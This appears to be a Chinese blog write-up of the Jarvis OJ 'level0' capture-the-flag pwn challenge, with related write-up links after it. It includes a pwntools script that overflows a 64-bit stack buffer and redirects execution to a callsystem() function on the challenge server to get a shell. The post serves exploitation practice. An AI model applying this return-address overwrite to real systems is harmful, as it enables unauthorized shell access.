(Jarvis Oj)(Pwn) level0

原创 2018年04月17日 20:43:18

(Jarvis Oj)(Pwn) level0

首先用checksec查一下保护。几乎没开什么保护措施。
这里写图片描述
用ida反汇编。main函数就调用了两个函数。
这里写图片描述
跟进第二个函数。
这里写图片描述
找到溢出点,同过buf缓冲区。又找到函数callsystem()。
这里写图片描述
只要控制程序返回到callsystem地址即可。找到callsystem地址。
这里写图片描述
写得脚本。

  1 from pwn import *
  2 callsystem_addr=0x400596
  3 pad=0x80
  4 payload="A"*pad+"BBBBBBBB"+p64(callsystem_addr)
  5 print payload
  6 conn=remote("pwn2.jarvisoj.com","9881")                
  7 conn.sendline(payload)
  8 conn.interactive();

注意是64位程序,所以覆盖rbp和返回地址时都要用64位数据。

版权声明:本文为博主原创文章,未经博主允许不得转载。 https://blog.csdn.net/github_36788573/article/details/79980492

JarvisOJ-PWN-Level0

JarvisOJ-PWN-Level0 IDA打开分析。 在Export找到这两个关键函数。 先双击进入main 关键函数在vulnerable_function(),继续跟进。 ...
  • qq_35495684
  • qq_35495684
  • 2018-03-15 18:07:05
  • 42

jarvisoj pwn level1 ——记第一次shellcode的编写

jarvisoj(https://www.jarvisoj.com/challenges )pwn部分 level1 解题过程:在队友的指导下写了人生第一个shellcode感觉很刺激,过程中还是学到...
  • qq_29947311
  • qq_29947311
  • 2017-03-19 10:12:50
  • 1184

JarvisOJ-PWN-Level1

JarvisOJ-PWN-Level 先checksec一下: 发现NX栈保护没有打开,也就是堆栈代码没有进行保护,那么就就题目很可能就是要输入shellcode在栈里执行吧。 打开IDA分...
  • qq_35495684
  • qq_35495684
  • 2018-03-16 13:41:49
  • 35

JarvisOJ Web&Reverse&Pwn

Web 0x01 phpinfo 0x02 WEB 0x03 Easy Gallery 0x04 Login 0x05 PORT51 0x06 LOCALHOST 0x07 神盾局的秘密 0x08 I...
  • qq_31481187
  • qq_31481187
  • 2016-11-16 17:38:59
  • 42524

Writeup of level4(Pwn) in JarvisOJ

大年初一浅浅地学了个leak?0x00 What is DynELF?pwntool-DynELF详见官方文档咯~0x01 checksecroot@kali:~/Desktop/Pwn/level4...
  • cossack9989
  • cossack9989
  • 2018-02-16 17:01:47
  • 93

JarvisOJ-PWN-Level2

JarvisOJ-PWN-Level2 IDA打开,稍微分析下发现其和level1大致一样,都是利用read栈溢出。 shift+12查看字符串 看到/bin/sh 双击得到地址: ...
  • qq_35495684
  • qq_35495684
  • 2018-03-22 18:09:21
  • 32

jarvisoj pwn inst_prof writeup

这题其实是google ctf的一道题 看到的时候完全震惊了。。。4字节shellcode。。。这要怎么弄啊 想了半天想不出,然后看了下别人的wp,又一次被震惊了,还有这种骚操作。。。 在执行s...
  • charlie_heng
  • charlie_heng
  • 2018-01-23 20:52:50
  • 76

JarvisOJ-PWN-Tell_Something

JarvisOJ-PWN-Tell_Something 首先,检查后是64位的gcc。 用IDA打开。 在Export发现这些函数: 这些函数一看就知道是自己写的函数了。 先看main ...
  • qq_35495684
  • qq_35495684
  • 2018-03-16 21:50:23
  • 23

(Jarvis Oj)(Pwn) level2

(Jarvis Oj)(Pwn) level2 首先用checksec查一下保护。这次NX开启了。 用ida反汇编,找到溢出点。 这次system函数又出现了。于是想着是否可以通过控制调...
  • github_36788573
  • github_36788573
  • 2018-04-19 14:28:41
  • 0

(Jarvis Oj)(Pwn) level1

(Jarvis Oj)(Pwn) level1 首先用checksec查一下保护。几乎没开什么保护措施。关键的是NX没开,意味着栈上的数据可执行。 用ida反汇编,找到溢出点。 但这次没...
  • github_36788573
  • github_36788573
  • 2018-04-18 21:35:04
  • 3
收藏助手
不良信息举报
您举报文章:(Jarvis Oj)(Pwn) level0
举报原因:
原因补充:

(最多只允许输入30个字)